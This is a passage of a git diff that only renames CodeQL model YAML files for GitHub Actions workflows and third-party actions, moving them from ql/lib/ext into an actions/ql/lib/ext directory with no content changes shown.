ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/actions/ql/lib/ext/manual/8398a7_action-slack.model.yml similarity index 100% rename from ql/lib/ext/manual/8398a7_action-slack.model.yml rename to actions/ql/lib/ext/manual/8398a7_action-slack.model.yml diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml similarity index 100% rename from ql/lib/ext/manual/AsasInnab_regex-action.model.yml rename to actions/ql/lib/ext/manual/AsasInnab_regex-action.model.yml diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml similarity index 100% rename from ql/lib/ext/manual/MeilCli_regex-match.model.yml rename to actions/ql/lib/ext/manual/MeilCli_regex-match.model.yml diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml similarity index 100% rename from ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml rename to actions/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml similarity index 100% rename from ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml rename to actions/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml similarity index 100% rename from ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml rename to actions/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml similarity index 100% rename from ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml rename to actions/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml similarity index 100% rename from ql/lib/ext/manual/ab185508_file-type-finder.model.yml rename to actions/ql/lib/ext/manual/ab185508_file-type-finder.model.yml diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml similarity index 100% rename from ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml rename to actions/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/actions/ql/lib/ext/manual/actions_github-script.model.yml similarity index 100% rename from ql/lib/ext/manual/actions_github-script.model.yml rename to actions/ql/lib/ext/manual/actions_github-script.model.yml diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml rename to actions/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml similarity index 100% rename from ql/lib/ext/manual/akefirad_loadenv-action.model.yml rename to actions/ql/lib/ext/manual/akefirad_loadenv-action.model.yml diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml similarity index 100% rename from ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml rename to actions/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml similarity index 100% rename from ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml rename to actions/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml similarity index 100% rename from ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml rename to actions/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/actions/ql/lib/ext/manual/anchore_sbom-action.model.yml similarity index 100% rename from ql/lib/ext/manual/anchore_sbom-action.model.yml rename to actions/ql/lib/ext/manual/anchore_sbom-action.model.yml diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/actions/ql/lib/ext/manual/anchore_scan-action.model.yml similarity index 100% rename from ql/lib/ext/manual/anchore_scan-action.model.yml rename to actions/ql/lib/ext/manual/anchore_scan-action.model.yml diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml similarity index 100% rename from ql/lib/ext/manual/andresz1_size-limit-action.model.yml rename to actions/ql/lib/ext/manual/andresz1_size-limit-action.model.yml diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/actions/ql/lib/ext/manual/android-actions_setup-android.model.yml similarity index 100% rename from ql/lib/ext/manual/android-actions_setup-android.model.yml rename to actions/ql/lib/ext/manual/android-actions_setup-android.model.yml diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml similarity index 100% rename from ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml rename to actions/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml similarity index 100% rename from ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml rename to actions/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml similarity index 100% rename from ql/lib/ext/manual/appleboy_ssh-action.model.yml rename to actions/ql/lib/ext/manual/appleboy_ssh-action.model.yml diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml similarity index 100% rename from ql/lib/ext/manual/asdf-vm_actions.model.yml rename to actions/ql/lib/ext/manual/asdf-vm_actions.model.yml diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml similarity index 100% rename from ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml rename to actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml similarity index 100% rename from ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml rename to actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml similarity index 100% rename from ql/lib/ext/manual/aszc_change-string-case-action.model.yml rename to actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml similarity index 100% rename from ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml rename to actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml similarity index 100% rename from ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml rename to actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml 